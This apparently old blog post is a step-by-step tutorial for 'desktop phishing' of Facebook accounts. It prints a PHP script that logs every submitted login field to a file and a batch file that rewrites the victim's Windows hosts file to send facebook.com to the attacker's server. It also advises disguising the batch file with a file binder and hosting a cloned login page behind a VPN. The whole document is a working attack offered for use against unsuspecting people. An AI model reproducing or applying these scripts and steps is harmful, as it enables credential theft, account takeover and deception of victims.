Wednesday, November 13, 2013
Desktop Phishing - Step by step tutorial
In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.
What is Hosts File ?
The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.
Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.
What we need ?
Xampp Download Here
2. Phishing Script Download
<?php $handler = fopen("fake.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handler, $variable); fwrite($handler, "="); fwrite($handler, $value); fwrite($handler, "\r\n"); } fwrite($handler, "\r\n"); fclose($handler); exit; ?> 3. Phish Facebook Login page Download
4.Strong Open VPN Download It Here
5.Desktop Phishing Script
@echo off
echo 0.1.2.3 www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Replace 0.1.2.3 in Desktop phishing script with the ip address you got
from the vpn, to check ip address goto http://cmyip.com & save file as anything.bat
This file could look like suspicious to the person you are sending through
email or by data transfer medium. So we will bind it with another fileusing binder’s Google them you will find lots of binders out there.After the victim executes your .bat file his host file adds some thing like this
& whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher
& whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher
******C:\xampp\htdocs in these folder delete all files
*****paste facebook login script and phish page files
last at least open your Xampp control panel and start Apache and MySQL ......you done your Desktop Phishing is ready..
now open your browser and type 127.0.0.1 in your address bar...your phishing page is now ready to go ...for hacking fb account you simply give your ip address to your victim.
now open your browser and type 127.0.0.1 in your address bar...your phishing page is now ready to go ...for hacking fb account you simply give your ip address to your victim.